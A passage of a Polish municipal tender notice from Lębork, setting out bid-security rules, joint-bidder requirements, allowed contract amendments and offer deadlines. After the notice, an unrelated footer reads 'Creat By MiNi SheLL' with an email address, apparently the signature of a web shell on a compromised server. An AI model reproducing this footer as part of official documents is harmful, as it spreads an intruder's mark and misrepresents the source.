wskazanie ich siedzib. Beneficjentem wskazanym w<br/>gwarancji lub poręczeniu jest Gmina Miasto Lębork, ul. Armii Krajowej 14, 84-300<br/>Lębork,<br/>b) określenie wierzytelności, która ma być zabezpieczona gwarancją/poręczeniem,<br/>c) kwotę gwarancji/poręczenia do wysokości której poręczyciel/gwarant będzie<br/>zobowiązany,<br/>d) wskazanie terminu ważności gwarancji/poręczenia, z którego upływem wygasa<br/>zobowiązanie, przy czym poręczenie o charakterze terminowym nie może zostać<br/>odwołane.<br/>e) zobowiązanie gwaranta do zapłacenia kwoty gwarancji/poręczenia<br/>bezwarunkowo, na pierwsze pisemne żądanie Zamawiającego, w sytuacjach<br/>określonych w art. 98 ust. 6 ustawy Pzp.<br/>12)W przypadku, gdy Wykonawca nie wniesie wadium lub wniesie w sposób<br/>nieprawidłowy lub nie utrzyma wadium nieprzerwanie do upływu terminu związania<br/>ofertą lub złoży wniosek o zwrot wadium, w przypadku o którym mowa w art. 98 ust. 2<br/>pkt 3 ustawy Pzp, Zamawiający odrzuci ofertę na podstawie art. 226 ust. 1 pkt 14<br/>ustawy Pzp.<br/>13)Zamawiający zwraca wadium na zasadach określonych w art. 98 ust. 1–5 ustawy Pzp.<br/>14)Zamawiający zatrzymuje wadium wraz z odsetkami na podstawie art. 98 ust. 6 ustawy<br/>Pzp.<br/>15)Wadium wniesione w formie poręczenia lub gwarancji bankowej lub gwarancji<br/>ubezpieczeniowej musi posiadać zapis, że przypadku zatrzymania wadium przez<br/>Zamawiającego, żądanie zapłaty wadium będzie doręczone do gwaranta najpóźniej w<br/>terminie 3 dni po okresie ważności gwarancji. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1) Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia (spółki cywilne,<br/>konsorcja). W przypadku Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia publicznego oferta przedstawiona przez dwóch lub więcej Wykonawców<br/>(współpartnerów) wchodzących w skład konsorcjum lub spółki cywilnej musi być<br/>przedstawiona jako jedna oferta, od jednego podmiotu i spełniać następujące<br/>wymagania:<br/>a) Wykonawcy występujący wspólnie są zobowiązani do ustanowienia Pełnomocnika<br/>(lidera) do reprezentowania ich w postępowaniu o udzielenie niniejszego<br/>zamówienia albo do reprezentowania ich w postępowaniu i zawarcia umowy<br/>w sprawie zamówienia publicznego. Umocowanie (stosowne pełnomocnictwo)<br/>należy przedłożyć wraz z ofertą – treść pełnomocnictwa powinna dokładnie<br/>określać zakres umocowania.<br/>b) Jeżeli oferta Wykonawców wspólnie ubiegających się o udzielenie zamówienia<br/>publicznego, zostanie wybrana, Zamawiający zastrzega możliwość żądania przed<br/>zawarciem umowy w sprawie zamówienia publicznego, przedłożenia umowy<br/>regulującej współpracę tych Wykonawców.<br/>c) W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia,<br/>oświadczenia i dokumenty potwierdzające brak podstaw do wkluczenia<br/>z postępowania składa w swoim imieniu każdy z Wykonawców wspólnie<br/>ubiegających się o zamówienie.<br/>Oświadczenie składane na podstawie art. 125 ust 1 ustawy Pzp, potwierdza brak<br/>podstaw do wykluczenia oraz spełnianie warunków udziału w postępowaniu w<br/>zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w<br/>postępowaniu, według wzoru stanowiącego załącznik nr 4 do SWZ.<br/>d) Wypełniając Formularz oferty, jak również inne dokumenty powołujące się na<br/>„Wykonawcę”; w miejscu „np. nazwa i adres Wykonawcy” należy wpisać dane<br/>dotyczące wszystkich Wykonawców (współpartnerów) wspólnie ubiegających się<br/>o zamówienie, a nie ich Pełnomocnika (lidera) lub jednego ze współpartnerów.<br/>e) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia solidarnie<br/>odpowiadają za podpisanie i wykonanie umowy.<br/>f) W ofercie powinien być podany adres do korespondencji i kontakt telefoniczny<br/>z Pełnomocnikiem Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia. Wszelka korespondencja będzie prowadzona przez Zamawiającego<br/>wyłącznie z Pełnomocnikiem (liderem). <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Uzupełnienie i zmiany niniejszej umowy mogą być dokonywane jedynie za zgodą obu<br/>stron i dla swej ważności wymagają formy pisemnej w postaci aneksu do umowy pod<br/>rygorem nieważności.<br/>2. Zamawiający dopuszcza możliwość dokonania zmian (zgodnie z art. 455 ust 1 PZP)<br/>postanowień zawartej umowy w następujących przypadkach:<br/>1) Zmiany danych dotyczących stron umowy, jak zmiana nazwy (jeśli nie oznacza<br/>przekształcenia podmiotowego lub przedmiotowego) siedziby, adresu, numeru konta<br/>bankowego np. w przypadku zmian wpisów w ewidencji działalności gospodarczej lub<br/>KRS;<br/>2) Osób upoważnionych, jako przedstawiciele stron, itp. w przypadku nieprzewidzianych<br/>zdarzeń losowych m.in. takich jak choroba, śmierć, ustanie stosunku pracy, zmiana<br/>pełnomocnictwa do nadzorowania i koordynowania;<br/>3) Zmiany podwykonawcy lub wprowadzenie nowego podwykonawcy. W takim<br/>przypadku wymagana jest zgoda Zamawiającego. Zamawiający zaakceptuje i wyda<br/>zgodę na zmianę podwykonawcy jeżeli Wykonawca dokona rozliczenia z poprzednim<br/>podwykonawcą oraz dochowa procedury określonej dla zawarcia umowy o<br/>podwykonawstwo (zgodnie z zapisami umownymi) w tym:<br/>a) rezygnacja z podwykonawstwa;<br/>b) zmiana zakresu podwykonawstwa.<br/>4) Zmiany Wykonawcy - Zamawiający zaakceptuje i wyda zgodę na zmianę Wykonawcy<br/>celem spełnienia postanowień umownych Zamawiającego:<br/>a) w wyniku połączenia, podziału, przekształcenia, upadłości, restrukturyzacji lub<br/>nabycia dotychczasowego Wykonawcy lub jego przedsiębiorstwa, o ile nowy<br/>wykonawca spełnia warunki udziału w postępowaniu, nie zachodzą wobec niego<br/>podstawy wykluczenia oraz nie pociąga to za sobą innych istotnych zmian umowy;<br/>b) w wyniku przejęcia przez Zamawiającego zobowiązań Wykonawcy względem jego<br/>podwykonawców.<br/>5) Zmiany wynagrodzenia i terminu realizacji zamówienia w przypadku:<br/>a) wstrzymania robót przez Zamawiającego z przyczyn leżących po stronie<br/>Zamawiającego termin wykonania umowy może ulec przesunięciu o okres nie<br/>dłuższy niż okres wstrzymania robót;<br/>b) wystąpienia siły wyższej (zdarzenia, którego strony nie mogły przewidzieć, któremu<br/>nie mogły zapobiec, ani któremu nie mogą przeciwdziałać, a które uniemożliwia<br/>Wykonawcy wykonanie w całości lub części jego zobowiązań) lub innych okoliczności<br/>niezależnych od Wykonawcy, lub których Wykonawca przy zachowaniu należnej<br/>staranności nie był w stanie uniknąć lub przewidzieć, jak również inne przeszkody<br/>lub utrudnienia w wykonaniu przedmiotu umowy spowodowane przez osobę trzecią<br/>– o czas działania siły wyższej oraz czas potrzebny do usunięcia skutków jej działania<br/>oraz usunięcia przeszkód, a także wysokości wynagrodzenia;<br/>c) zmian w zakresie rzeczowym przedmiotu zamówienia, które warunkują wykonanie<br/>całości zamówienia (w tym zmian materiałowych), wykonania zamiennych bądź<br/>zwiększających zakres zadania robót, wynikających z narad technicznych lub<br/>inwentaryzacji stanu istniejącego, wykonanie robót dodatkowych koniecznych do<br/>prawidłowego wykonania realizowanego zamówienia.<br/>d) wstrzymania realizacji robót budowlanych przez Zamawiającego z przyczyn<br/>niezależnych od Wykonawcy;<br/>e) zmniejszenie zakresu umowy w przypadku:<br/>Nieprzyznania środków finansowych w kolejnym roku realizacji umowy lub<br/>przyznania ich w ograniczonym zakresie w planie finansowym Zamawiającego;<br/>f) jeżeli konieczność zmiany umowy spowodowana jest okolicznościami, których<br/>Zamawiający, działając z należytą starannością, nie mógł przewidzieć, o ile zmiana nie<br/>modyfikuje ogólnego charakteru umowy a wzrost ceny spowodowany każdą kolejną<br/>zmianą nie przekracza 50% wartości pierwotnej umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-07-14 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">ofertę wraz z wymaganymi dokumentami należy złożyć na platformie zakupowej pod adresem https://platformazakupowa.pl/pn/lebork</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-07-14 11:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-08-12</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com